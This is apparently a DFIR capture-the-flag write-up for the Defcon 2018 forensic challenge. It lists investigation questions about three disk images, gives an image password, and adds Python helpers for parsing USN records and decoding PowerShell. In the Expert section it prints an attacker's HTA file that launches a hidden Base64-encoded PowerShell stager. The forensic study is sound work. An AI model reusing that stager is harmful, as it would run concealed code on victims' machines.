DEFCON DFIR CTF 2018 — Lessons Learned

Primer + Proof of Completion:

Low Effort MS Paint skillz. Yep I’m hightail

Introduction

Daily Blog #451: Defcon DFIR CTF 2018 Open to the Public

Hello Reader,
This year at Defcon we made things interesting with a challenge that involves making your way through 3 images to answer questions and solve a case. Now that Defcon is over and the winners awarded it’s your turn to give the challenge a try.

The first image password is ‘tacoproblems’
The second and third image password is gained by answering the right questions in the CTF.


CTF Site:
https://defcon2018.ctfd.io/

Download Links:
Image 1:
https://www.dropbox.com/s/1q4f0fowo8048mq/Image1.7z?dl=0

Image 2:
https://www.dropbox.com/s/9gzjfqkl8uup58k/Image2.7z?dl=0

Image 3:
https://www.dropbox.com/s/jvaqb4rfi3jojbk/Image3.7z?dl=0

HR Server (Image 1)

Basic

Which software was used to image the HR Server?

Which version of the software was used to image the HR Server? [Format: n.n]

What is the file name that represents MFT Entry 168043?

What is the MFT Entry number of the following file? \xampp\mysql\bin\mysql.exe

What is the MFT Attribute ID of the named $J data attribute for the MFT Entry with a file name of $UsnJrnl? [format is an integer]

At 2018-08-08 18:10:38.554 (UTC) what was the IP address of the client that attempted to access SMB via an anonymous logon?

What was the name of the batch file saved by mpowers? [answer is fullpath starting with c:*****]

What is the name of the hr management application that hosts a web server?

What was the public url for the HR system’s portal? [format: http://*****]

What is the name of the file that had a change recorded with an update sequence number of 368701440?

What is the name of the deleted file with a reference number of 12947848928752043?

$UsnJrnl:$J Results
$Logfile results

Advanced

At 2018-07-30 22:31:33 UTC which user was logged in under, what was the logon type (integer), and the logon process name? [format: {TargetUserName} — {LogonType} — {LogonProcessName} — {IpAddress}]

Bingo

At 2018-07-27 02:42:43 (UTC), what is the name of the task that was started?

Which IP address was accessing the OrangeHRM portal via Chrome 68.0.3440.84?

What version of Apache was being used [format: n.n]

What is the integer representation for the reason code given a USN V2 record where the record’s reason flags have the following: USN_REASON_CLOSE | USN_REASON_DATA_EXTEND | USN_REASON_FILE_CREATE
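The USN questions above (update sequence number, file reference number, reason flags) all come down to reading fields of a USN_RECORD_V2. The following is an added example, not part of the original write-up: a minimal parser that combines and decodes reason flags and splits a file reference number into MFT entry and sequence number. The sample record is constructed (file name, USN and timestamp are made up), and the flag table is only a subset of the SDK's values.

```python
import struct
from datetime import datetime, timedelta, timezone

# Subset of USN_REASON_* bit values from the Windows SDK (winioctl.h).
USN_REASONS = {
    0x00000001: "USN_REASON_DATA_OVERWRITE",
    0x00000002: "USN_REASON_DATA_EXTEND",
    0x00000100: "USN_REASON_FILE_CREATE",
    0x00000200: "USN_REASON_FILE_DELETE",
    0x00001000: "USN_REASON_RENAME_OLD_NAME",
    0x00002000: "USN_REASON_RENAME_NEW_NAME",
    0x80000000: "USN_REASON_CLOSE",
}
HEADER = struct.Struct("<IHHQQqQIIIIHH")  # fixed 60-byte part of USN_RECORD_V2
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

def encode_reasons(names):
    """OR named flags into the integer stored in the record's Reason field."""
    by_name = {name: bit for bit, name in USN_REASONS.items()}
    value = 0
    for name in names:
        value |= by_name[name]
    return value

def decode_reasons(value):
    return [name for bit, name in sorted(USN_REASONS.items()) if value & bit]

def split_file_reference(ref):
    """Low 48 bits are the MFT entry number, high 16 bits the sequence number."""
    return ref & 0xFFFFFFFFFFFF, ref >> 48

def parse_usn_v2(buf):
    (length, major, _minor, ref, _parent, usn, filetime, reason,
     _source, _sec_id, _attrs, name_len, name_off) = HEADER.unpack_from(buf)
    if major != 2 or length > len(buf) or name_off + name_len > length:
        raise ValueError("not a complete USN_RECORD_V2")
    entry, sequence = split_file_reference(ref)
    return {"usn": usn, "mft_entry": entry, "sequence": sequence,
            "timestamp": FILETIME_EPOCH + timedelta(microseconds=filetime // 10),
            "reasons": decode_reasons(reason),
            "name": buf[name_off:name_off + name_len].decode("utf-16-le")}

def build_sample():
    """Constructed record: every field value here is made up for the demo."""
    name = "sample.txt".encode("utf-16-le")
    stamp = (datetime(2018, 1, 1, tzinfo=timezone.utc) - FILETIME_EPOCH) // timedelta(microseconds=1) * 10
    reason = encode_reasons(["USN_REASON_FILE_CREATE", "USN_REASON_CLOSE"])
    return HEADER.pack(60 + len(name), 2, 0, (5 << 48) | 1234, (5 << 48) | 5,
                       4096, stamp, reason, 0, 0, 0x20, len(name), 60) + name
```

Tools that list journal entries usually show the file reference number as one 64-bit integer, so `split_file_reference` is the step that ties a journal line back to an MFT entry.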

Expert

What was the top communicating IP address with the web server?

How many requests were made to the web server where the requested url contained a wget command within it?

File Server

Basic

What is the volume serial number of the only partition on the File Server Disk Image?

What is the name of the examiner who made the Forensic Image?

ewfinfo
FTK

Who cleared the security event log?

What is the hostname of the computer?

When was the computer last shutdown? UTC Time In the format of Month/Day/Year Hour:Minute:Second in 24 hour time 1/1/2018 14:01:01

What is the Current Build number of Windows on the File Server computer?

What was mpowers user id?

Which program did Max Powers last run through the GUI?

When did Max Powers last open projections.zip? UTC Time Day/Month/year Hour:Minute:Sec in 24 hour time 1/1/2018 15:20:11

How many clusters are on the partition?

Advanced

Where does the \VSS directory go?

When was the Volume Shadow Copy 1 created? Enter answer in UTC Time in the following format 1/1/2018 13:11:11 Month/Day/Year 24 Hour Time

Where did Max Powers login from?

Get-WinEvent -FilterHashtable @{Path=".\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx"; ID=21} | Where-Object -Property Message -match 'mpowers' | fl | more

What program was used to delete forensic artifacts?

What is the name of the zip file that contains the M4Projects directory?

What host was used to exfil the data?

What is the url where the data was exfiled to?

Jigsaw puzzle skillz ftw
SAM + SYSTEM?

What did the USN Journal get wiped with?

What service did the attacker use to access this system?

Expert

What program extracted Mnemosyne.sys?

What directory was wiped?

Who requested the data to be exfiled?

What is the email address of the person who uploaded the data to Dropbox?

Desktop

Basic

What was the IP address of the Desktop?

What is the SID of the Administrator account?

What is the timezone offset that the system is in? Example -1

Note: I’m still unsure if it was indeed a misconfiguration. If you have comments/suggestions or if you know why -4 was the answer, please let me know. :D

What is the name of the deleted volume shadow copy directory in the recycle bin?

What is the name of the directory the attacker copied the files from the VSS to?

SAM + SYSTEM?

What is the name of the file the attacker exfiled?

What is the ip of the Magnetic Forensics website that the attacker accessed?

What was the administrator’s password?

Advanced

How did the attacker access the system?

When did the attacker login to the box for the first time? UTC Time Date Format Month/Day/Year 24 Hour Time 1/1/2018 22:00:00

What account did the attacker login via rdp?

When did the account you just identified last have the password changed? UTC Time Format Year-Month-Day 24 Hour Time 2018-01-01 14:01:01

What gave the attacker access to Max Power’s other accounts?

What is the name of the file that stored the data you identified in the prior question?

What is the password to the file you identified that allowed the attacker to get access to the other systems?

What is max powers password on the File Server? This answer is case sensitive

What was the IP address of the acquisition computer?

Expert

What is the IP and port that hosted malicious code that was used in the initial attack? [format: IP:PORT]

$ cat out.hta
<html><head><script>var c= 'powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBFAFIAcwBJAE8AbgBUAGEAQgBsAEUALgBQAFMAVgBFAFIAcw
...JABEAGEAdABhAC4AbABlAG4AZwBUAEgAXQA7AC0AagBPAEkATgBbAEMASABhAHIAWwBdAF0AKAAmACAAJABSACAAJABkAEEAdABBACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA='
new ActiveXObject('WScript.Shell').Run(c);</script></head><body><script>self.close();</script></body></html>
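The argument to -enc in the HTA above is Base64 over UTF-16LE text, so triage starts with decoding it and looking for host:port strings. The following is an added example, not part of the original write-up: it decodes such arguments, tolerating a blob that was cut short like the one shown, and lists URL hosts found in the result. The sample command and address are constructed (harmless command, RFC 5737 documentation address).

```python
import base64
import re

ARG = re.compile(r"-(\w+)\s+([A-Za-z0-9+/=]{16,})")
HOST = re.compile(r"https?://([0-9A-Za-z.\-]+)(?::(\d+))?", re.IGNORECASE)

def decode_blob(blob):
    """Base64 -> UTF-16LE text, tolerating a blob that was cut short."""
    blob = blob.rstrip("=")
    if len(blob) % 4 == 1:          # a single dangling character holds no full byte
        blob = blob[:-1]
    raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
    # Drop a trailing odd byte so the UTF-16LE decode sees whole code units.
    return raw[: len(raw) - len(raw) % 2].decode("utf-16-le", errors="replace")

def encoded_commands(text):
    """Decode every argument passed with a prefix of -EncodedCommand (or -ec)."""
    found = []
    for flag, blob in ARG.findall(text):
        flag = flag.lower()
        if "encodedcommand".startswith(flag) or flag == "ec":
            found.append(decode_blob(blob))
    return found

def hosts(script):
    """host:port pairs from URLs in the decoded script, default ports filled in."""
    pairs = []
    for m in HOST.finditer(script):
        default = "443" if m.group(0).lower().startswith("https") else "80"
        pairs.append(f"{m.group(1)}:{m.group(2) or default}")
    return pairs

# Constructed sample: harmless command, documentation-range address (RFC 5737).
SAMPLE_SCRIPT = "Write-Output 'constructed sample' # http://192.0.2.10:8080/placeholder"
SAMPLE_B64 = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode()
SAMPLE_LINE = "var c= 'powershell -noP -sta -w 1 -enc " + SAMPLE_B64 + "'"

if __name__ == "__main__":
    for script in encoded_commands(SAMPLE_LINE):
        print(script)
        print(hosts(script))
```

Stagers often assemble the URL at run time, so an empty result from `hosts` does not mean the script makes no network connection; read the decoded text as well.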

What was the name of the file executed by the attacker from the ip identified prior?

What is that program actually?

Final Thoughts
